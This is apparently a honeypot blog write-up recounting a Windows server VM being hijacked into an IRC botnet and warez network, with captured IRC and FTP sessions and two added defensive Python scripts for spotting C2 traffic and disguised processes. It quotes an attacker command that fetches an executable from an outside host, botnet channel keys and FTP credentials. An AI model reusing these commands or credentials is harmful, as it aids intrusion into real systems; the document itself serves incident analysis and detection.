inscene.ath.cx -- svchost.exe and msconfig.exe
verdict: fascinating
Poor server2k3 gets transferred onto VMWare on Fedora Core 6 where he is made to work day and night. It only takes 12 hours before the first successful break-in. Still the VNC authentication flaw is the best, apparently.
I have had to firewall several ports back off because whatever break-ins happen through them are mind-numbingly boring. Like the buffer overflow on port 445. I can't see the point of something that just sends server down so he needs a restart, or worse, meddles with the system files so he needs to revert to snapshot. No fun.
Anyhow, a customer of the Swiss ISP bluewin.ch finds my server and breaks in at exactly the same time as one from bredband.comhem.se, which was slightly confusing, but the capture says the Swede merely entered `cmd c/ echo open 83.250.195.169 21304 get 7.exe`, in that ubiquitous auto-scan sort of way, whereas the Swiss guy is actually controlling the desktop. Fascinating.
First off he changes the security levels on Internet Explorer to add inscene.110mb.com as a trusted site, and then downloads two files from there, to wit install.exe and serv.exe. He then runs both. This brings up a command prompt and server is told the following:
[screenshot of the command prompt]
Server begins to scan the local network on port 5900 -- a pretty good indication that the program has phoned home somewhere for instructions. The packet trace shows that server connected to an IRC botnet thingy on 203.121.177.54:65500, an IP belonging to Central Trading Co. Ltd in Thailand:
```
NICK L0-10x4
USER farifjo "fo5.net" "lol" :farifjo
:irc.botnet.org NOTICE AUTH :*** Looking up your hostname...
:irc.botnet.org NOTICE AUTH :*** Found your hostname
PING :DA5D1A0B
PONG DA5D1A0B
:irc.botnet.org 001 L0-10x4 :Welcome to the botnet IRC Network L0-10x4!farifjo@87-194-136-23.bethere.co.uk
:irc.botnet.org 002 L0-10x4 :Your host is irc.botnet.org, running version Unreal3.2.6
:irc.botnet.org 003 L0-10x4 :This server was created Fri Dec 22 22:22:59 2006
:irc.botnet.org 004 L0-10x4 irc.botnet.org Unreal3.2.6 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.botnet.org 005 L0-10x4 NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
:irc.botnet.org 005 L0-10x4 WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=botnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:irc.botnet.org 005 L0-10x4 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.botnet.org 251 L0-10x4 :There are 1 users and 59 invisible on 1 servers
JOIN ##zomgitsdbot## passwordizzle
:irc.botnet.org 254 L0-10x4 8 :channels formed
:irc.botnet.org 255 L0-10x4 :I have 60 clients and 0 servers
:irc.botnet.org 265 L0-10x4 :Current Local Users: 60 Max: 61
:irc.botnet.org 266 L0-10x4 :Current Global Users: 60 Max: 61
:irc.botnet.org 422 L0-10x4 :MOTD File is missing
:L0-10x4 MODE L0-10x4 :+iwx
:L0-10x4!farifjo@botnet-EDFF8497.bethere.co.uk JOIN :##zomgitsdbot##
:irc.botnet.org 332 L0-10x4 ##zomgitsdbot## :.scan 64 seq b 2 0
:irc.botnet.org 333 L0-10x4 ##zomgitsdbot## Fr0zen_and_R4v3r1n 1174562880
:irc.botnet.org 353 L0-10x4 @ ##zomgitsdbot## :L0-10x4 L1-f7ka L3-j[}r W3-17y5 W3-85bu W3-]fae L3-vkt1 W3-nk_f W3-`5}b L3-p3_u L2-{j3d L3-atvh W3-o2ud W3-rjy4 W2-j}gt W2-zkfe L3-14kg L3-kw]g L3-^9f1 L3-qi-7 L3-}1t| L2-qyn` L2-vrfm L3-8q9x L3-asfv L3-9adl L1-37eg W1-2l2- W3-6zhv W1-}7[c L1-8a`0 W3-`eew L3-l9v3 L3-zt^c L3-7jg8 L3-{mpa L2-l10- W3-09o7 L3-o1ck W1-k[y^ W1-9``e L1-|zet W3-8-3k Fr0zen_and_R4v3r1n W0-^lf{ W1-_3g2 W0-95vz W3--ue3 W3-53{f W3-1_}5
:irc.botnet.org 353 L0-10x4 @ ##zomgitsdbot## :L3-vcn_ W1-04}j W3-qxal W1-3m-2 W3-]koj W1-7]z3 W0-859[ W3-[i6{
:irc.botnet.org 366 L0-10x4 ##zomgitsdbot## :End of /NAMES list.
JOIN ##zomgitsdbot## passwordizzle
PRIVMSG ##zomgitsdbot## :Scanning: 192.168.0.0, 64 threads. FTP: 30830.
PRIVMSG ##VNC## :VNC3.8 SERVER2K3: 192.168.0.121 - [AuthBypass]
```
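What marks the session above as bot command-and-control rather than chat is the shape of it: the bot joins a keyed channel, takes its orders from the channel topic (the `.scan` dot-command set by Fr0zen_and_R4v3r1n, which it acts on immediately) and reports results back with PRIVMSG. The parser below is an added example, not code from the post; it pulls those three signals out of a constructed excerpt of the capture so the same check can be run over any IRC session pulled from a packet trace.

```python
import re

# Constructed excerpt of the IRC capture above (server lines start with ':').
CAPTURE = """\
NICK L0-10x4
USER farifjo "fo5.net" "lol" :farifjo
JOIN ##zomgitsdbot## passwordizzle
:irc.botnet.org 332 L0-10x4 ##zomgitsdbot## :.scan 64 seq b 2 0
:irc.botnet.org 251 L0-10x4 :There are 1 users and 59 invisible on 1 servers
PRIVMSG ##zomgitsdbot## :Scanning: 192.168.0.0, 64 threads. FTP: 30830.
PRIVMSG ##VNC## :VNC3.8 SERVER2K3: 192.168.0.121 - [AuthBypass]
"""

JOIN_RE = re.compile(r"^JOIN (\S+) (\S+)$")            # JOIN <channel> <key>
TOPIC_RE = re.compile(r"^:\S+ 332 \S+ (\S+) :(.*)$")   # RPL_TOPIC: channel and topic text
REPORT_RE = re.compile(r"^PRIVMSG (\S+) :(.*)$")       # client talking back to a channel


def triage(capture: str) -> dict:
    """Extract the C2 tell-tales from a client-side IRC capture.

    Returns keyed channels joined, topics that look like bot commands
    (a leading dot), and everything the client reported to a channel.
    """
    out = {"channels": {}, "commands": [], "reports": []}
    for line in capture.splitlines():
        m = JOIN_RE.match(line)
        if m:
            out["channels"][m.group(1)] = m.group(2)   # join with a key: private bot room
            continue
        m = TOPIC_RE.match(line)
        if m and m.group(2).startswith("."):           # topic is a dot-command, not a title
            out["commands"].append((m.group(1), m.group(2)))
            continue
        m = REPORT_RE.match(line)
        if m:
            out["reports"].append((m.group(1), m.group(2)))
    return out


if __name__ == "__main__":
    for kind, items in triage(CAPTURE).items():
        print(kind, items)
```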
svchost.exe
Any Windows installation has a number of svchost processes running. When viewed in Task Manager, they all look the same. Virus writers want their programs to go unobserved, I imagine, so they tend to have two approaches to the naming of their executables. One is to name it with a slight typo, but run it from the system32 directory. The other is this one: name it the same, but run it from somewhere else. All the legitimate svchosts (well, it's only one program really, invoked a number of times with different options) run from \windows\system32. This one runs from \windows\system32\drivers\disdn\. This is an existing directory, but as far as I know it's usually empty. Of course Task Manager doesn't tell you the path to the process.
FTP server
Before long there is a login to the ftp server. I am not totally sure what this is all about though? RETR is the same as GET? It was only just put there by the same IP address? I'm sure Fr0zen kn0ws wh4t h3 15 d01ng.
```
220 ProFTPD 1.2.10 Server ready.
USER Fr0zen
331 .[34mUsEr nAmE OkAy, NeEd pAsSwOrD!!!
PASS 14111980
230- .. ............ ....... ....... .. ..........
230- ... ...... ... .... .....................
230- ... ....... ... ... ... ................
230- .... ........ ... ... .. ................
230- ............ ... ... ... ........ .......
230- ........... .... .... ............. ......
230- ......................................... ..........
230-...----..[ Str0 by Fr0zen and R4v3r1n ]..----..------.
230-| Server Uptime: 0 Days, 0 Hours, 0 Mins |
230-| System Uptime: 0 Days, 1 Hours, 1 Mins |
230-| Free Space C:\: 6.13 GB D:\: 0 Bytes |
230-| Free Space E:\: N/A F:\: N/A |
230-| Free Space G:\: N/A H:\: N/A |
230-| Free Space I.\: N/A J:\: N/A |
230-| Free Space K:\: N/A L:\: N/A |
230-| Free Space M:\: N/A N:\: N/A |
230-| Free Space O:\: N/A P:\: N/A |
230-| Free Space Q:\: N/A R:\: N/A |
230-| Free Space S:\: N/A T:\: N/A |
230-| Free Space U:\: N/A V:\: N/A |
230-| Free Space W:\: N/A X:\: N/A |
230-| Free Space Y:\: N/A Z:\: N/A |
230-| Uptime Upload: 0 Bytes / 0 KB/s |
230-| Uptime Dnload: 0 Bytes / 0 KB/s |
230-| Alltime Upload: 0 Bytes / 0 KB/s |
230-| Alltime Dnload: 0 Bytes / 0 KB/s |
230-| Users Logged In: 1 current / 1 since start |
230-| Net Usage Up: 0.0 KB/s Dn: 0.0 KB/s |
230-|----------------------------------------------------|
230-| User: FR0ZEN IP: 83.77.205.159 |
230-| Alltime Upload: 32.46 MB Download: 1.52 GB |
230-| Last Login: 07:45, 19.03.2007 Logins: 21 |
230-|----------------------------------------------------|
230-:[This Site is powered by JASTAT. View "SITE HELP"!!]:
230 .[31mPaSsWoRd sEeMs tO Be oKaY,.[30mhaVe pHuN
SYST
215 ProFTPD: 1337-.8 (c) by Fr0zen
FEAT
211-Extension supported
CLNT
MDTM
MDTM YYYYMMDDHHMMSS[+-TZ];filename
SIZE
SITE PSWD;EXEC;SET;INDEX;ZONE;CHMOD;MSG
REST STREAM
XCRC filename;start;end
MODE Z
211 End
CLNT FlashFXP 3.2.0.1080
200 Noted.
PWD
257 "/c:" .[34mIs cUrReNt dIrEcToRy.
TYPE A
200 Type set to A.
MODE Z
200 MODE Z ok.
PASV
227 .[34mEnTeRiNg ShIt pAsSiVe mOdE (192,168,0,121,4,64)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
CWD /c:/windows/system32/drivers/disdn
250-Clients:[1]-Up:[0.0 KB/s]-Dn:[0.0 KB/s]-Space:[6.13 GB]
250 .[34mDiReCtOrY ChAnGeD To /c:/WINDOWS/system32/drivers/disdn
PWD
257 "/c:/WINDOWS/system32/drivers/disdn" .[34mIs cUrReNt dIrEcToRy.
PASV
227 .[34mEnTeRiNg ShIt pAsSiVe mOdE (192,168,0,121,5,221)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
TYPE I
200 Type set to I.
SIZE svchost.exe
213 800256
PASV
227 .[34mEnTeRiNg ShIt pAsSiVe mOdE (192,168,0,121,6,20)
RETR svchost.exe
150 Opening BINARY mode data connection for svchost.exe (800256 Bytes).
226-.-----------------------[Download Stats]--------------------------.
226-| Filename | Size | Speed |
226-|---------------------------------------+-------------+-----------|
226-| svchost.exe | 781 KB | 97 KB/s |
226-:---------------------------------------+-------------+-----------:
226 .[34mYeAh, TrAnSfEr cOmPlEtE Du hAsT Es gEsChAfFt!
```
Msconfig.exe is located in C:\System Volume Information\msconfig, which is a fine directory for anything, as the default Windows configuration won't even let you see it (it's usually set to hidden) or look in it ("access denied"), and even if you could see the size of it, I imagine most people's SVIs are pretty big anyway what with all the System Restores there (yes, the ones that put your virus straight back onto your computer...). Of course, if you were always logged in as a user rather than an administrator, none of this would have happened in the first place. How likely is that though on Windows?
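Both hiding tricks described in the svchost.exe section and here (a genuine name run from the wrong directory, a lookalike name, and a binary parked in System Volume Information) are invisible in Task Manager but trivial to spot once you have a list of process image paths. The audit below is an added example, not code from the post; the process list is a constructed sample (the disdn and SVI paths come from this write-up) and the baseline directories for svchost.exe and lsass.exe are assumed from a default install.

```python
import ntpath  # Windows path handling regardless of where the script runs

# Constructed sample of (process name, image path) pairs, in the shape one gets
# from "wmic process get name,executablepath" on the infected box.
SAMPLE_PROCESSES = [
    ("svchost.exe", r"C:\WINDOWS\system32\svchost.exe"),
    ("svchost.exe", r"C:\WINDOWS\system32\svchost.exe"),
    ("svchost.exe", r"C:\WINDOWS\system32\drivers\disdn\svchost.exe"),   # the bot
    ("scvhost.exe", r"C:\WINDOWS\system32\scvhost.exe"),                 # typo-squat
    ("msconfig.exe", r"C:\System Volume Information\msconfig\msconfig.exe"),
    ("lsass.exe", r"C:\WINDOWS\system32\lsass.exe"),
]

# Assumed baseline: where the genuine copies live on a default install.
EXPECTED_DIR = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
}

# Directories that should never contain a running executable.
FORBIDDEN_DIRS = ("system volume information",)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, enough to catch one- or two-character name squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit(processes):
    """Return (name, path, reason) for every process that fails a check."""
    findings = []
    for name, path in processes:
        lname = name.lower()
        ldir = ntpath.dirname(path).lower()
        if lname in EXPECTED_DIR:
            if ldir != EXPECTED_DIR[lname]:          # right name, wrong directory
                findings.append((name, path, "wrong_path"))
        else:
            for real in EXPECTED_DIR:                # unknown name close to a known one
                if edit_distance(lname, real) <= 2:
                    findings.append((name, path, f"lookalike of {real}"))
                    break
        if any(d in ldir for d in FORBIDDEN_DIRS):   # hiding in a directory users can't open
            findings.append((name, path, "runs from System Volume Information"))
    return findings
```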
Next time I look, we're on a different IRC channel. An awful lot of scrolling is going off. Something to do with warez. Here is a sample "conversation" since it's way too long to include here.
What I do like is the little warning that comes up at the start:
:Global!services@inscene.ath.cx NOTICE [iNS-UK]-6GB :[.Logon News. - Jan 05 2007] .Warnung! Dies ist ein privates Netzwerk! Wenn du keinen Account (und damit keine Erlaubnis dich hierher zu verbinden) besitzt, musst du sofort die Verbindung trennen! Danke..
Hmm... I suppose I have an account, seeing as that they've given me one?
Well, as Poor Server has now been made to join a warez bot army, I am waiting for the warez, and it doesn't take long at all. The bluewin.ch customer uploads a movie to my System Volume Information. Unfortunately it's German, as most of the stuff seems to be. I'm regretting going with the VMWare default option of an 8GB drive now, who knows what I'm missing out on.
I delete the movie. The next day the switzerman uploads a folder called 'utils' containing, surprise surprise, utilities, mainly related to picture and movie conversion. It's better than before, but I notice that the files are incomplete. Why would Frozen be doing that? I mean, it's as good as garbage like this. I'm hoping that this oversight will soon be mended, but there's no sign of it.
Fr0zen does have a little look round my drives though, and discovers a cd in the tray he obviously likes the look of. He begins to download the files off it. Hey -- we can't be having that now!
Another thing to notice at this point is the names of the computers that have been forcefully recruited into this bot army. They appear to be based on IP nationality and size of hard drive free space. So what's with the ones that have 'linux' in the name? I dread to think that our good friends the linux fanatics are also becoming the victims of this evil. I'm going with the explanation that some of these people might be there voluntarily sharing warez? I really would like to think that linux was way too secure an operating system to be thus implemented. Root? Who is that?